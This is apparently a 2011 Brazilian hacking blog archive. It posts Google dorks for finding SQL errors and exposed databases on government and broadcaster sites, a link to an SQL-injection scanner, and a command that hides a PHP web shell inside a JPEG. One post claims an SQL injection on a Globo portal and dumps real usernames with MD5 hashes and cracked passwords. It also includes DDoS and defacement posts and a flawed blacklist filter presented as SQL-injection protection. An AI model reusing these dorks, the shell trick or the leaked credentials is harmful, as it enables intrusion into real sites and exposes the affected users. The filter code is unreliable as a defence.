Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

sexta-feira, 29 de abril de 2011

#PrecoJusto INFORMAÇÃO SEM IMPOSTO | TEXTO COMPLETO

GOOGLEINURL - BRASIL APOIA:

#PrecoJusto

 http://www.precojustoja.com.br/





Há muito tempo que o povo brasileiro se calou quase que por inteiro. Poucos estão interessados em se unir para lutar pelo que é justo. Passeatas praticamente não existem mais, revoltas muito menos, mas se a geração Coca-Cola esperava uma oportunidade paracomeçar a se unir, ela chegou agora.
Ano após ano somos estuprados pelos altíssimos impostos no Brasil. Tiram muito e devolvem praticamente nada, deixando um verdadeiro rombo no orçamento de diversos brasileiros. Ano após ano, também, vemos notícias sobre corrupção, festa com dinheiro público e aumento de salários dos políticos, mas não fazemos rigorosamente nada. Para se ter uma ideia, hoje, dia 26/04, o site www.impostometro.com.br informa que, em apenas 4 meses, o governo arrecadou mais de 440 BILHÕES DE REAIS. Onde está o nosso retorno? Onde estão nossos benefícios devolvidos? Onde está o nosso dinheiro? Ah sim, provavelmente no showzinho do Luan Santana realizado com verba pública somente para servidores do estado, que custou 1.3 milhão de reais… Do nosso dinheiro.
Está na hora de utilizar a Internet para organizar um manifesto pela luta do que consideramos justo.
Há tempo demais somos obrigados a pagar valores exorbitantes para podermos ter aquilo que o resto do mundo inteiro tem barato: produtos de mídia e eletrônicos como DVD’s, BluRays, Videogames, Jogos, iPads, iPhones, iPods e tantos outros exemplos. No país onde o salário mínimo é de 540 reais, nosso governo tem a cara de pau de fazer com que um simples lançamento de filme em BluRay saia por 80 desses suados reais.
Oitenta reais em um filme é mais que uma cuspida em nossa cara, principalmente quando sabemos que, lá fora, o mesmo filme é vendido por ridículos 26 reais (no caso, 17 dólares). O mesmo acontece em todos os outros segmentos, como você pode ver abaixo:
Playstation 3 – Lá fora: 474 reais
Playstation 3 lá fora
No Brasil: 2000 reais
Playstation 3 no Brasil
Call of Duty Black OPS Wii – Lá fora: 63 reais
Preço do jogo Call of Duty Black Ops pra Wii lá fora
No Brasil: 200 reais
Preço do jogo Call of Duty Black Ops pra Wii na FNAC
iPad 64GB 3G – Lá fora: 954 reais
Preço do iPad 3G 64Gb lá fora
No Brasil: 2400 reais
O manifesto #PrecoJusto tem o objetivo de enviar para Brasília a nossa insatisfação e revolta. Nele, basta você assinar com seu nome, email e CPF que nós tomaremos todas as medidas necessárias para que enxerguem nossa manifestação e, assim, possamos sair da Internet para conseguirmos uma lei.
Aqui é só o início, o local onde você pode ajudar a fazer um país melhor. Esse é apenas o primeiro de muitos manifestos veiculados pela Internet e que tomarão repercussão e força nacional para chegarem em Brasília. Assine, divulgue, participe, fique antenado nos acontecimentos, pois se a Internet é o futuro, está na hora de utilizá-la para moldar melhor o NOSSO futuro!

sexta-feira, 22 de abril de 2011

Acessando BD access com dork

Acessando BD access com dork
Geralmente o caminho da bd vem com o erro da pagina só copiar e color no seu navegado se a barra tiver investida so ageitar pronto.

Dork:
-pdf  -forum site:*.br +Driver *.mdb
Autor:googleinurl

Pra quem gosta de xeretar ftp://ftp.prodemge.gov.br/



Pra quem gosta de xeretar
ftp://ftp.prodemge.gov.br/

segunda-feira, 18 de abril de 2011

GOOGLEINURL SCANNER versão exe 1.0

 GOOGLEINURL SCANNER  1.0


 Scanner sqli-ONLINE.exe versão GOOGLEINURL 1.0

Vou adaptar para sqli + RFI + yahoo scan; bing scan :
BAIXAR: goo.gl/TtnNV

quinta-feira, 14 de abril de 2011

Dork para uma busca em varios sites de nosso governo ERRO SQL é de menos.

Secretaria de Logística e Tecnologia da Informação

A ampliação da transparência e do controle social sobre as ações do Governo Federal é um dos objetivos principais da SLTI e, entre as suas atribuições, está a competência de planejar, coordenar, supervisionar e orientar, normativamente, as atividades do Sistema de Administração de Recursos de Informação e Informática - SISP, com enfoque na melhoria da prestação de serviços por meios eletrônicos e na regulamentação das compras e contratações públicas relacionadas ao uso das Tecnologias da Informação e Comunicação, no âmbito da Administração Pública Federal direta, autárquica e fundacional.


Com esta simples dork veremos a grande estrutura que sites do governo brasileiro nos oferece.

Dork: -forum -pdf -svn.softwarepublico.gov.br  inurl:.gov.br  mysql_connect() +id=

Autor:Googleinurl

Dork para busca de erros em algums sites do governo na Paraíba


Dork para busca de erros em algums sites do governo na Paraíba.


inurl:pb.gov.br  inurl:id= +error

Autor:Googleinurl

domingo, 10 de abril de 2011

Dork para busca de ProxY ~~

Dorks,, By Googleinurl

+proxy intext:8080 ext:txt

ou

proxy intext:8080 ext:txt

ou

proxy 200. intext:8080 ext:txt

ou

proxy,ip,port 200. intext:8080 ext:xls


Não cheguei a testar os poxy achados, mais creio que pode ajudar alguem.

Vulnerável portal globo nova análize, Login + Senha.


Erro de sql possibilita a invasão do portalclube da globo, essa vul é grande conhecida ja porem não achamos tela de login senha, quem conseguir tem logo abaixo a lista de user e suas senhas :)
OBS:
Tais usuarios devem ser de serviço pago da globo que á mesma não vejo esforço algum pra feixar tal brecha em seu portal, assim prestando um serviço falho e negligente para seus usuarios.

Site:http://portaldaclube.globo.com/noticia.php?hash=4c9db844fef519e85580848a46bd83bb&id=35457
 IP:        201.7.176.72
DB Server:     MySQL
Resp. Time(avg):    87 ms
Current User:     [email protected]
Sql Version:     5.0.68-enterprise-gpl-log
Current DB:     tvclube
System User:     [email protected]
Host Name:     riolb249
Installation dir:     /
DB User:     'usr_tvclube'@'10.%.%.%'
Data Bases:     information_schema
        ipmonitor
        mysql
        tvclube

LOGIN // SEHA CRIPT.. // SENHA DESCRIPT..


idenis 15608c11ede24161f59989657b3f2d93 MD5 : santarita
lady 1729bc477f7b098b508c1e99269c74a1 MD5 : lady
amelia 176226b2d51002d2590f048881560569 MD5 : amelia
wendel 180f2b3fd15267deb08c088cb642db61 MD5 : esperantina
reinaldo 187a4958af68436bf1ce3dda5e2a3905 MD5 : reinaldo
marcio 1b150854805cbe12194c8dbc55c900cd MD5 : marcio
tereza 1ea438f58e538b595071443411d5f6b7 MD5 : blopes
miranda 1ee1877c6655ecc71dfead311c771bd0 MD5 : miranda
talencar 1f59c7c07b59971cff1de937755bb86a MD5 : talencar
admin 21232f297a57a5a743894a0e4a801fc3 MD5 : admin
clemilton 21c706fed226879e14ba11943358f549 MD5 : clemilton
vilanova 2cab2df7d7f8789081d26df812be437a MD5 : vilanova
layse 3218b3a2b8175efb708bfcde0ff8ef61 MD5 : layse
CLUBE 35459695729aa5dfd8321515f45d6920 MD5 : CLUBE
Pedro 38e2b2e31c0fce9537f735dda9fdf10a MD5 : Pedro
valterlima 39505886ed5f20d8662388273cb70a7d MD5 : valterlima
deusa 39ca2dfb7ab0ae9b11995588c57d1414 MD5 : deusa
tamiris 39d9ff3ebbbed1e41b8892b5edf03e20 MD5 : tamires
josevita 3e5add7a6c97395506294c70705cd02e MD5 : josevita
clube3 45a63b4855983232bc546c00a20f6ee5 MD5 : clube3
antonio 4a181673429f0b6abbfd452f0f3b5950 MD5 : antonio
christiane 4ccf963379bd67fbde81b52adade3384 MD5 : emartins
Chagas Silva 571c27315c70037116b4826ab5897e98 MD5 : Chagas Silva
raiylson 605759bf31a1fcfa4bcb8996baf247af MD5 : raiylson
Parnaíba 6081a835f52987a08b0fb66732924b1f [Not Found]
aldeneides 63c51bad7c27cb9fe4a19b0043b6895c MD5 : aldeneides
Raimundo Nonato 72657bc8f5c9491ae8b090ccefa14cbc MD5 : Raimundo Nonato
josegil 75d95b03ad68de5fded7c78aa424787b MD5 : josegil
gilson 7a3838bd6e1c4efdaff13d2ccc5380e6 MD5 : d@ni3ll3
wauthier 7ba4979beb4eb2626142b3fe940c04d2 MD5 : wauthier
teresa 87574e3e9216e89429f8af597b016479 MD5 : buriti
natanael 8a67e964ad9c7a48de18d6ae7a9dbf2b MD5 : natanael
psaboia 8f31bd17ca05982113975b413d2fe2ab MD5 : psaboia
globo 909f6c90b6db150078092be31dc47ffd MD5 : globo
flavio 978f5586ff4b42ead079d1f802fb05f4 MD5 : paulistana
emerson 9a064cee0381711e8579448294ab4be3 [Not Found]
george 9b306ab04ef5e25f9fb89c998a6aedab MD5 : george
nilson 9c405163c4de5cf5d7f0deb741a7e27e MD5 : nilson
jonas 9c5ddd54107734f7d18335a5245c286b MD5 : jonas
charles a5410ee37744c574ba5790034ea08f79 MD5 : charles
anna a70f9e38ff015afaa9ab0aacabee2e13 MD5 : anna
gilberto bafff1df7d916f99fbe8be1a81dc326f MD5 : gilberto
Richards bb80b7c78cbc7101c375ab38d63a2b07 MD5 : richards
Portal da Clube c02484ccba66e0681adc1b6f6e0b664c [Not Found]
neudenor c579342cf5f90550189f1ee833e1d9db MD5 : neudenor
klecio c62a48a206157722b13df45fae62be11 MD5 : klecio
welhitom ccebf5637246df8383b5473e0115708a MD5 : welhitom
virgiane d10d259e89cade42ca16ff46c4c89b43 MD5 : virgiane
weslley d38b704c2b6a0f01ca520bc0fc49a312 MD5 : weslley
paulobarro dd41cb18c930753cbecf993f828603dc MD5 : paulo
tony ddc5f5e86d2f85e1b1ff763aff13ce0a MD5 : tony
jose df5ba866ae83a5a7cbaae75a18dd398a MD5 : smendes
paz e003268a052a053ee5ec481e2a097648 MD5 : paz
zmaia e434dd9c7f573fb03924e0c4d3d44d45 MD5 : eco
portal eca1d1f97ba4b98284990de8dd03684c MD5 : globo.com
daniel f1b9cb2cd92b9534bbdf45c001ba8f78 MD5 : uniao

Dork para um busca de erros em sites Emissora de tv


Dork para busca de erros sql em sites de Emissora de tv Brasileiras :),
Nem sempre o achado do erro sql siguinifica um grande burado no site.

Dork:
-forum -hardware.com.br -mxstudio.com.br -imasters.com.br site:*.com.* +br  +tv +error +sql
Autor: Googleinurl

quinta-feira, 7 de abril de 2011

Juntando shell com imagem pelo prompt de comando


Juntando shell com imagem pelo prompt de comando 
Autor: Alternative
Comando: copy foto.jpg + c100.php deface.jpg


Dork para buscar error sql em sites de orgãos brasileiros.

   Dork criada para busca de erros sql em sites .org brasileiros,
Milhões investidos veja infraestrutura dos sites .org do brasil

Dork: inurl:org +br inurl:id= +error +sql
Fonte:
blog.inurl.com.br
Autor: Googleinurl

O Governo brasileiro CRIOU UM Orgão Que vai supervisionar uma Segurança do País cyber, Fonte de notícias online relatado Convergência Digital.
A organização, chamado de grupo de segurança cibernética técnica, vai funcionar sob o governo de TIC Departamento de Segurança DSIC e incluirá os ministros da Justiça do Brasil, relações exteriores e defesa, bem como funcionários do Exército, Marinha e agências de aeronáutica. A Organização, chamado de Grupo de Segurança cibernética Técnica, vai funcionar soluço o Governo de TIC Departamento de Segurança DSIC e incluirá OS ministros da Justiça do Brasil, Relações Exteriores e Defesa, Bem Como Funcionários do Exército, Marinha e Agências de Aeronáutica.
O grupo ficará encarregado de proteger os sistemas governamentais de comunicação e bases de dados, bem como à salvaguarda das infra-estruturas críticas. O Grupo ficará Encarregado de Proteger OS Sistemas Governamentais de Comunicação e bases de Dados, Bem Como à salvaguarda das infra-estruturas Críticas.
Em maio, a imprensa local citou cabeça DSIC Raphael Mandarino, dizendo que o governo brasileiro está estudando a elaboração de um plano nacional de contingência em caso de um ataque cibernético. Em maio, A Imprensa local Citou Cabeça DSIC Raphael Mandarino, dizendo Que o Governo brasileiro estabele Estudando um Elaboração de Plano de hum Nacional de contingência in Caso de Ataque cibernético um. Ele também observou que uma do governo federal de 320 redes receberam 3mn ataques durante os 12 meses anteriores. also UMA Que marca Ele observou do Governo Federal de 320 Redes receberam 3mn Ataques Durante OS 12 Meses Anteriores.
Ele disse que o governo já formou vários grupos para estudar a viabilidade de um tal plano. Elementos Disse Que o Governo JÁ formou Vários Grupos parágrafo Estudar um Plano.
Fonte:http://www.bnamericas.com/news/technology/Government_creates_cyber_security_body

quarta-feira, 6 de abril de 2011

Video ASP injection demostração

Video aula com demonstrando um ataque  ASP injection feito pelo hacker NoxXxoN





Função que previne ataque a sites utilizando SQL Injection.

Para quem não sabe SQL Injection é uma falha de programação comumente cometida entre desenvolvedores que estão começando a desenvolver sistemas e não têm uma noção muito boa sobre segurança.

Essa falha permite que o atacante faça login como administrador sem nem saber o nome do usuário ou sua senha, permite que se insiram dados nas tabelas utilizadas pelo site ou até que se delete completamente uma tabela ou banco de dados de um site sem nem mesmo precisar fazer o login.

'CODIGO:
function LimparTexto(str)
str = trim(str)
str = lcase(str)
str = replace(str,"=","")
str = replace(str,"'","")
str = replace(str,"""""","")
str = replace(str," or ","")
str = replace(str," and ","")
str = replace(str,"(","")
str = replace(str,")","")
str = replace(str,"<","[") str = replace(str,">","]")
str = replace(str,"update","")
str = replace(str,"-shutdown","")
str = replace(str,"--","")
str = replace(str,"'","")
str = replace(str,"#","")
str = replace(str,"$","")
str = replace(str,"%","")
str = replace(str,"¨","")
str = replace(str,"&","")
str = replace(str,"'or'1'='1'","")
str = replace(str,"--","")
str = replace(str,"insert","")
str = replace(str,"drop","")
str = replace(str,"delet","")
str = replace(str,"xp_","")
str = replace(str,"select","")
str = replace(str,"*","")
LimparTexto = str
end function

'----------------------------------[ Para usar a função] ------------------------------------
$login = LimparTexto($_POST["login"])
$senha = LimparTexto($_POST["senha"])

Fonte do video:http://www.youtube.com/watch?v=cyHYZVaKRqI&feature=mfu_in_order&list=UL
Autor: NoxXxoN

Fonte do codigo protetor de tela de login a sql injectiton:
http://codigofonte.uol.com.br/codigo/asp/seguranca/funcao-para-evitar-sql-injection
Autor: Rodrigo Araujo

Criar um rooter de windows em php

Video aula feita por: NoxXxoN.
Esse video tem como objetivo ensinar voce a criar um rooter de windows em php.






1. Diferenças entre comandos internos e externos
Os comandos internos podem ser executados em qualquer pasta no PC e a qualquer momento pois estão embutidos no DOS. Os comandos externos são programas utilitários que acompanham o sistema operacional e que só podem ser executados onde estão localizados, ou seja, no drive onde foram gravados. Este tutorial está dividido em 2 partes: comandos internos e comandos externos.
2. Os comandos internos
Nos comandos internos pode-se saber mais informações acerca do mesmo, digitando /? após o comando, ex.: dir/?, você irá receber informações sobre o comando dir, os comandos internos são os mais úteis em emergências já que podem ser executados em qualquer lugar; agora, vamos aos comandos.
Comando DATE
Esse comando, como o nome já diz, mostra na tela a data atual, permitindo a sua modificação. O comando DATE deverá ser usado da seguinte maneira: date [opções] (Sem os colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Ex.: Digitando date, irá aparecer:
Data atual: sáb 28/06/2003
Digite a nova data: (dd-mm-aa)

Opções:
/t - Informa a data mas não solicita uma nova.
Comando TIME
Esse comando faz a mesma coisa que o comando DATE mas ao invés de mudar a data ele muda a hora: esse comando mostra hora, minutos, segundos e centésimos de segundo. O comando TIME deverá ser usado da seguinte maneira: Time [opções] (Sem os colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Ex.: Digitando time, irá aparecer:
Hora Atual: 17:01:20,98
Digite a nova Hora:

Opções:
/t – Informa a hora mas não solicita uma nova.
Comando VER
Esse comando mostra qual sistema operacional você está usando.
Ex.: Digitando ver, irá aparecer:
Microsoft Windows XP [versão 5.1.2600]
Comando CLS
Esse comando limpa a tela e posiciona o cursor no canto superior esquerdo da tela.
Comando Dir
O comando dir é muito famoso e quase todos já conhecem: ele mostra todos arquivos e pastas de um diretório e busca arquivos em um drive especificado. O comando DIR é usado da seguinte maneira: dir [drive:\][caminho\] arquivo(s) [opções] (Sem os colchetes) sendo que não é necessária a utilização das opções caso você não queira nem de arquivo(s).
Opções:
/p - A listagem pára toda vez que atinge o fim da tela, sendo necessário que se pressione qualquer tecla para continuar.
/b – Mostra somente as informações básicas.
/c – Mostra o separador de milhar no tamanho dos arquivos.
/w – Exibe a lista na horizontal, onde são mostrados 5 arquivos por linha.
/d – O mesmo que /w, só que mostra a lista em colunas.
/s – Exibe os arquivos de todos os subdiretórios.
/l – Usa letras minúsculas.
/n – Formato de lista longa em que os nomes dos arquivos ficam na extrema direita.
/q - Mostra o nome do dono do arquivo.
/4 – Exibe anos de 4 dígitos.
/t:campo – Controla qual campo de tempo é exibido ou usado na classificação onde campo deve ser substituído por um desses caracteres e não devem ser digitados os 2 pontos (:).
C – Criação.
A – Último acesso.
W – Última gravação.
/o:ordem – Mostra os arquivos em uma ordem, onde ordem deve ser substituída por um desses caracteres e não devem ser digitados os 2 pontos (:).
N – Nome do arquivo seguido pela extensão.
S - Tamanho do arquivo.
D – Ordem cronológica.
G – Grupos de arquivos de subdiretórios.
/a:atributo - Mostra somente arquivos de determinado atributo, onde atributo deve ser substituído por algum desses caracteres e não devem ser digitados os 2 pontos (:).
D – Nome do arquivo seguido pela extensão.
R – Arquivos somente leitura.
H - Arquivos ocultos .
Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-)
Ex.: Dir /a-h, mostra todos os arquivos menos os arquivos ocultos.
Comando COPY
O comando COPY copia um determinado arquivo ou o disco inteiro, sendo que caso exista algum arquivo no destino com o mesmo nome do arquivo de origem, esse arquivo será substituído. O COPY deve ser usado da seguinte maneira: copy [drive:\][caminho\] arquivo(s) de destino [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Opções:
/v – Verifica o arquivo de destino após a cópia, esta opção deixa o copy mais lento.
/a - Indica um arquivo de texto ASCII.
/b - Indica um arquivo binário.
/d - Permite que o arquivo de destino seja criado descriptografado.
/n – Usa um nome de arquivo curto (Padrão 8.3), caso copie um arquivo fora deste padrão.
/y – Não pede confirmação para que você substitua um arquivo de destino já existente.
/-y – Pede confirmação para que você substitua um arquivo de destino já existente.
/z – Copia arquivos de rede no modo reiniciável.
Comando TYPE
Mostra o conteúdo de um arquivo (somente um por vez e não aceita caracteres curinga).
Comando REN ou RENAME
Renomeia o arquivo. Pode-se também alterar a extensão do mesmo.
Ex.: Ren Arquivo.txt Backup.bak, Isto renomeia o arquivo: Arquivo.txt, para Backup.bak.
Comando DEL ou ERASE
Apaga arquivos do disco rígido e deve ser usado da seguinte maneira: del [drive:\][caminho\] nome do(s) arquivo(s) [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Opções:
/p - Força a mensagem de confirmação “Apagar( S / N )?”.
/f – Força a exclusão de arquivos somente leitura.
/s – Exclui arquivos de todas as subpastas.
/q – Modo silencioso, não pede confirmação para excluir um caractere curinga global.
/a:atributo – Exclui somente arquivos de determinado atributo, onde atributo deve ser substituído por algum desses caracteres e não devem ser digitados os 2 pontos (:).
S – Arquivos de sistema.
R – Arquivos somente leitura.
H – Arquivos ocultos.
A - Arquivos prontos para arquivamento.
Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-).
Ex.: Del *.* /a-h, executando este comando, você exclui todos os arquivos menos os arquivos ocultos da pasta.
Comando MD ou MKDIR
Cria uma pasta, devendo ser usado da seguinte maneira: MD Pasta, onde Pasta é o nome da pasta que você quer criar.
Comando CD ou CHDIR
Entra ou sai de uma pasta: se você digitar CD TESTE, por exemplo, ele entrará na pasta TESTE. Se você digitar CD.. ele irá voltar para a pasta anterior. O mesmo vale para o CHDIR.
Comando RD ou RMDIR
Remove uma pasta que esteja vazia, sendo que não consegue remover pastas com arquivos. Deve ser usado da seguinte maneira: rd [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira.
Ex.: Digitando RD Teste você irá excluir a pasta teste.
Opções:
/s - Remove todas as pastas e arquivos da pasta, além dela mesma.
/q – Modo silencioso, não pede confirmação para remover a árvore de pastas quando usado com /s.
2. Os comandos externos
Assim como nos comandos internos pode-se usar o comando auxiliar /?, dentre os comandos externos, alguns são muito úteis, como o format veremos logo adiante…
Comando ATTRIB
O Attrib altera ou mostra os atributos de um arquivo, devendo ser usado da seguinte maneira: attrib [Atributo] [drive:\][caminho\] nome do(s) arquivo(s) [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções do “Atributo” dos colchetes:
+ Ativa um atributo.
- Desativa um atributo.
r – Atributo de arquivo somente leitura.
a – Atributo de arquivo de leitura/gravação.
s – Atributo de arquivo de sistema.
h – Atributo de arquivo oculto.
Opções:
/s - Processa os arquivos da pasta atual.
/d – Inclui pastas.
Comando FORMAT
Como o nome já diz, ele formata o drive. Deve ser usado da seguinte maneira: format [drive:] [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/fs:sistema de arquivos – Formata a partição como fat32, fat ou ntfs, é necessário substituir “sistema de arquivos”, por fat32, fat ou ntfs.
/v:nome – Formata a partição com um nome de volume específico.
/q – Formatação rápida (Tão rápida quanto a formatação de um disquete).
/c – Arquivos criados na partição serão compactados (somente com partições ntfs).
/x - Força primeiro a desmontagem do volume, se necessário. Todos os identificadores abertos no volume não seriam mais válidos.
/f:tamanho – Especifica o tamanho do disquete a ser formatado (Em formatações de disquete, claro).
/t:trilhas – Especifica o número de trilhas por lado do disco.
/n:setores – Especifica o número de setores por trilha.
Comando DISKCOPY
O comando DISKCOPY copia o conteúdo de um disco flexível para outro, sendo que eles devem ter o mesmo tamanho e densidade. Deve ser usado da seguinte maneira: diskcopy [drive de origem:] [drive de destino:] [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/v - Verifica os arquivos copiados após a cópia.
Comando XCOPY
O comando xcopy copia arquivos de um ou mais subdiretórios. Também pode copiar os subdiretórios, mas não copia arquivos de sistema ou ocultos, devendo ser usado da seguinte maneira: xcopy [drive:\][caminho\] arquivo(s) de destino [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/d – Copia arquivos que foram modificados a partir de uma certa data.
/p – Pede confirmação para cópia de cada arquivo.
/s – Copia diretórios e subdiretórios (Não copia pastas vazias).
/e/s – Copia os subdiretórios mesmo que estejam vazios.
/v - Verifica os arquivos copiados.
Obs.: Por ser um comando com inúmeras opções não é possível que eu escreva todas aqui. Para saber mais sobre o xcopy, vá no prompt de comando e digite xcopy /?
Comando TREE
O comando tree mostra as pastas e subpastas da pasta onde foi executado o comando. Parece complicado mas não é: é como a parte esquerda do Windows Explorer. Deve ser usado da seguinte maneira: tree [drive:\][caminho\][opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/f - Inclui nome dos arquivos de cada subdiretório.
/a - Exibe os subdiretórios com caracteres ASCII.
Comando DELTREE
É a combinação dos comandos del e tree: ele exclui arquivos de uma pasta suas subpastas e “subarquivos”. Deve ser usado da seguinte maneira: deltree [opções][drive:\][caminho\] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/y – Não pede confirmação para a exclusão dos arquivos.
Comando MOVE
O comando move altera a posição de um ou mais arquivos de uma pasta para outra. Deve ser usado da seguinte maneira: move [opções] [drive:\][caminho\]arquivo1,arquivo2 (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.
Opções:
/y - Não pede confirmação para a mudança dos arquivos.
/-y – Pede confirmação para mudança dos arquivos.
Para Renomear diretórios
Use [opções] [drive:\][caminho\]nome do diretório antigo [drive:\][caminho\]nome do diretório novo
3. Dicas
A. Nos comandos acima é possível a utilização de caracteres curinga como “*.*” (asterisco ponto asterisco), que significa todos os arquivos ,”relatorio.*“, que significa arquivos de nome relatorio com qualquer extensão, “*.txt“, significa qualquer arquivo com extensão .txt, “foto?.bmp“, que significa qualquer arquivo que comece com a palavra “foto” e tenha extensão .bmp
Resumindo, o asterisco (*) significa qualquer caracteres de qualquer tipo e interrogação (?) significa um caractere qualquer. Estes são chamados caracteres curingas e são muito úteis no MS-DOS.
B. Um comando que adoro digitar no Autoexec.bat é o deltree, eu digito a seguinte linha: deltree /y c:\windows\temp\. Se você leu atentamente o tutorial saberá que este comando serve para limpar a pasta temp do Windows toda vez que ele for iniciado, e para quem odeia o menu Documentos Recentes do menu Iniciar digite no autoexec.bat: deltree /y c:\windows\recent\ … 

Fonte do video:http://www.youtube.com/embed/sei0WRU9_68
Autor: NoxXxoN

Fonte do texto: http://www.invasaohacking.com/2010/05/13/comandos-do-ms-dos-prompt-de-comando/
Autor: Nuclear Boy

segunda-feira, 4 de abril de 2011

Sophia Hacker Group: ATACK DDOS!

[-Sophia Hacker Group-]
 Derrubando sites com ddos em php , feito pelo hacker: Alternative
 ATACK DDOS!:
Um ataque de negação de serviço (também conhecido como DoS, um acrônimo em inglês para Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores. Alvos típicos são servidores web, e o ataque tenta tornar as páginas hospedadas indisponíveis na WWW. Não se trata de uma invasão do sistema, mas sim da sua invalidação por sobrecarga. Os ataques de negação de serviço são feitos geralmente de duas formas:
  • Forçar o sistema vítima a reinicializar ou consumir todos os recursos (como memória ou processamento por exemplo) de forma que ele não pode mais fornecer seu serviço.
  • Obstruir a mídia de comunicação entre os utilizadores e o sistema vítima de forma a não comunicarem-se adequadamente.

quinta-feira, 31 de março de 2011

Pesquisar arquivos dentro de diretórios Skydrive


Pesquisar musicas dentro de diretórios Skydrive

Seu pendrive virtual.

Com o Windows Live SkyDrive você tem seus principais arquivos sempre à mão. Ou melhor, tem todos os arquivos que você quiser. Afinal, são 25GB de espaço. Só pra você ter uma ideia, dá para guardar 6.400 músicas. Ou 51.200 fotos. E ainda organizar por pastas, definir quem pode acessá-las e proteger tudo com senhas. Afinal, segurança é essencial.

Dork: site:.skydrive.live.com/  *.mp3  rihanna

Site: Governo do ceara invadido,

Portal do Governo do Ceará foi invadido por hackers

Relatos da rede social Twitter mostram que site está fora do ar desde o início da madrugada de quinta-feira


Ataque digital .Invasão ocorreu durante a madrugada de quinta-feira, O site do Governo do Estado do Ceará foi invadido. Relatos no Twitter apontam que desde o início da madrugada desta quinta-feira, 17, a página de internet do governo cearense sofreu o ataque hacker. Segundo informações do serviço de rede sociais, o portal governamental foi invadido à 1 h da manhã.
Os hackers com os apelidos 'n4sss', 'hackinho', 'fl4me' e 'hackerbrasilll' publicaram uma mensagem com o brasão do Estado do Ceará.
"O governo, e seus Servidores. Muito bons por sinal [sic].", diz parte da mensagem.
No final do mês de fevereiro o site do governo cearense já tinha sofrido outra invasão por hackers. Por volta das 2h30 da manhã desta quinta-feira o site saiu do ar.

 

terça-feira, 29 de março de 2011

Ataque anônimo no Warner Bros

Ataque anônimo no Warner Bros

Hacktivistas metas DDoS nome.

O hacktivist Anónimo coletiva temporariamente derrubou o site da Warner Bros Records, com um ataque distribuído de negação de serviço ontem.
De acordo com informações não confirmadas, o grupo foi também tentar baixar e-mails Warner Bros e material arquivado.
Anónimo lançou o ataque para protestar contra o envolvimento da Warner Bros, em um EUA 75 trillion dólares ação judicial contra a empresa de compartilhamento de arquivos LimeWire.
Treze outros estúdios de gravação foram envolvidos na ação por uma soma mais de cinco vezes o PIB dos Estados Unidos.
"Ataque anônimo no Warner Bros fez parte" Operação Payback "contra vários esforços para derrubar sites de compartilhamento de arquivo.
No início deste mês, Anónimo chamado para ataques DDoS no Departamento de Governo da Nova Zelândia de Assuntos Internos site para protestar contra um esquema de filtragem de Internet voluntário que a maioria dos grandes provedores de internet já aderiram.
O hacktivistas também atingiram sites do governo da Tunísia, Zimbábue, Egito, Iêmen e Itália, bem como sites corporativos, como os da Visa e Mastercard depois que se recusou a processar os pagamentos para o Wikileaks.
Anónimo emitiu a seguinte declaração para explicar o seu ataque:
"Limewire foi processado por 75 trilhões de dólares por 13 empresas discográficas. Cada agregado familiar único EUA teria de gastar toda sua renda comprando nada, mas a música para mais de 13 anos para chegar ao que a indústria da música tem uma solução considerada razoável.
Para colocar este número em perspectiva o PIB dos EUA é de US $ 14 trilhões - menos de um quinto do que a indústria fonográfica está pedindo.
Heck, o PIB de todo o mundo está entre 59 e 62 trilhões. Isso mesmo, a indústria da música quer LimeWire para pagar mais dinheiro do que existe no mundo inteiro.
Limewire, os demandantes alegam, deve-lhes entre os EUA 400,000 milhões dólar e dos EUA 75 trillion dólares. O último, gravado, vem a 75.000.000.000.000.
Mesmo a baixa de US $ 400 bilhões ainda equivale a sete por cento do rendimento total do agregado familiar em todo o país.
A idéia de que a indústria poderia pedir trilhões em prejuízos aparentemente brota de um sucesso anterior contra a Usenet em 2009, no qual a cópia de um número relativamente pequeno de obras (878) foi multiplicada pela pena máxima para chegar a um projeto de lei danos perto EUA $ 6,6 milhões.
No entanto, neste caso - que envolve um grande número de infratores -, o juiz disse que "permitindo Requerentes para recuperar vários prêmios por trabalhos com base no número de infratores diretos é insustentável".
Ao argumentar que Limewire devem ser elegíveis para os danos em cada download individual, os estúdios foram efetivamente argumentando que Limewire devia mais dinheiro do que a indústria do disco inteiro tem feito desde que Edison inventou o fonógrafo em 1877.
Estes são os autores e os nossos objectivos:
1 - Música Arista (BMG), http://www.bmg.com/
2 - Arista Records LLC, http://www.arista.com/
3 - Atlantic Recording Corporation, http://www.atlanticrecords.com/
4 - Capitol Records, Inc., http://www.capitolrecords.com/
5 - Elektra Entertainment Group Inc., http://www.elektra.com/
6 - Interscope Records, http://www.interscope.com/
7 - LaFace Records LLC, http://laface.com/
8 - Motown Record Company, LP, http://www.motown.com/
9 - Priority Records LLC, http://www.priorityrecords.com/
10 - UMG Recordings, Inc., http://www.universalmusic.com/
11 - Virgin Records America, Inc., http://www.virginrecords.com/
12 - Warner Bros Records Inc. http://www.warnerbrosrecords.com/.


fonte:http://www.itnews.com.au/News/252672,anonymous-hit-warner-bros-in-latest-operation-payback-attack.aspx

sábado, 12 de março de 2011

Invaders OF the LAW SatyGraha

 Invaders OF the LAW SatyGraha

Satyagraha foi o termo usado pelo pacifista indiano Mahatma Gandhi durante sua campanha pela independência da Índia. Em sânscrito, Satya significa 'verdade'. Já agraha quer dizer 'firmeza'. Assim, Satyagraha é a 'firmeza na verdade', ou 'firmeza da verdade'. Satyagraha significa o princípio da não-agressão, ou uma forma não-violenta de protesto, como um meio de revolução. Satyagraha também é traduzido como "o caminho da verdade" ou "a busca da verdade".


segunda-feira, 7 de março de 2011

Scanner dork google GB.xml


